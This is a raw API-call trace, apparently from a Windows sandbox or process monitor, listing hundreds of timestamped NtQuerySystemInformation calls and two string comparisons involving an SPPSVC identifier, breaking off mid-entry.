[0238.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0238.379] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0238.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0238.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0238.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0238.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0238.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0238.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0238.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0238.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0238.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0238.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0238.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0238.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0238.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0238.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0238.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0238.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0238.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0238.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0238.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0238.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0238.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0238.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0238.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0238.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0238.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0238.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0238.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0238.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0238.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0238.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0238.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0238.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0238.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0238.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0238.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0238.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0238.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0238.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0238.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0238.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0238.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x28, ResultLength=0x0) [0238.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0238.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0238.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e880, Length=0x20, ResultLength=0x0) [0238.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0238.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0238.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.427] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 